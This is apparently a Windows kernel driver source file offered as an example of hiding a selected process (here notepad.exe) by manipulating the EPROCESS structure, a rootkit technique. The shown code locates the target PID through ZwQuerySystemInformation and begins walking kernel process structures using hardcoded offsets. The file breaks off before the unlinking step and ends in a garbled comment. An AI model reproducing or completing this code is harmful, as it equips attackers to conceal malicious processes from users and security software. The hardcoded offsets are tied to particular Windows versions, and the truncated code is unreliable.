process_to_hide.c

The example of driver, which hides selected process, by manipulating EPROCESS struct, lang:C

#include <ntddk.h>

typedef ULONG DWORD;
#define PIDOFFSET 0x84
#define FLINKOFFSET 0x88

PEPROCESS currProc;
DWORD eproc;
PLIST_ENTRY plist_activ_procs;
int current_PID = 0;
int start_PID = 0;
int i_count = 0;

typedef struct _SYSTEM_THREADS {
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER CreateTime;
    ULONG         WaitTime;
    PVOID         StartAddress;
    CLIENT_ID     ClientId;
    KPRIORITY     Priority;
    KPRIORITY     BasePriority;
    ULONG         ContextSwitchCount;
    LONG          State;
    LONG          WaitReason;
} SYSTEM_THREADS, * PSYSTEM_THREADS;

typedef struct _SYSTEM_PROCESSES {
    ULONG             NextEntryDelta;
    ULONG             ThreadCount;
    ULONG             Reserved1[6];
    LARGE_INTEGER     CreateTime;
    LARGE_INTEGER     UserTime;
    LARGE_INTEGER     KernelTime;
    UNICODE_STRING    ProcessName;
    KPRIORITY         BasePriority;
    ULONG             ProcessId;
    ULONG             InheritedFromProcessId;
    ULONG             HandleCount;
    ULONG             Reserved2[2];
    VM_COUNTERS       VmCounters;
#if _WIN32_WINNT >= 0x500
    IO_COUNTERS       IoCounters;
#endif
    SYSTEM_THREADS    Threads[1];
} SYSTEM_PROCESSES, * PSYSTEM_PROCESSES;

NTSYSAPI
NTSTATUS
NTAPI
ZwQuerySystemInformation (
    IN ULONG    SystemInformationClass,
    OUT PVOID   SystemInformation,
    IN ULONG    Length,
    OUT PULONG  ReturnLength
);

void OnUnload(IN PDRIVER_OBJECT driverObject)
{
   DbgPrint("Driver is unload\n");
}

ULONG GetProcessID()
{
	NTSTATUS status;
	ULONG cbBuffer = 0x8000;
	WCHAR proc_to_hide[] = L"notepad.exe";
    SYSTEM_PROCESSES* spProcesses;
    ULONG processID = 0; 
	CHAR* pBuffer;
	
	do 
	{
		pBuffer = ExAllocatePool(NonPagedPool, cbBuffer);
		status = ZwQuerySystemInformation(5, pBuffer, cbBuffer, 0);
	}while(STATUS_INFO_LENGTH_MISMATCH == status);
	
	spProcesses = (SYSTEM_PROCESSES*)pBuffer;
	while(1)
	{	
		WCHAR* proc_name = spProcesses -> ProcessName.Buffer;
		if(!!proc_name)
		{
            if( !wcscmp(proc_name, proc_to_hide))
            {
                processID = spProcesses->ProcessId;
				return processID;
                break;
            }   
		}
        if( !spProcesses->NextEntryDelta )
			break;
		spProcesses = (PSYSTEM_PROCESSES)((CHAR*)spProcesses + spProcesses->NextEntryDelta);
	}
	return (ULONG)0;
}

DWORD FindProcessEPROC(int terminate_PID)
{
	//DbgPrint("Entering to <<FindProcessEPROC>>...");
	//DbgPrint("terminate_PID is %d", terminate_PID);
	eproc = 0x00000000;

	//PLIST_ENTRY plist_activ_procs;

	eproc = (DWORD)PsGetCurrentProcess();
	//DbgPrint("eproc is %d", eproc);
	if(terminate_PID == 0)
		return terminate_PID;

	start_PID = *((int*)(eproc + PIDOFFSET));// 篑蜞磬怆桠噱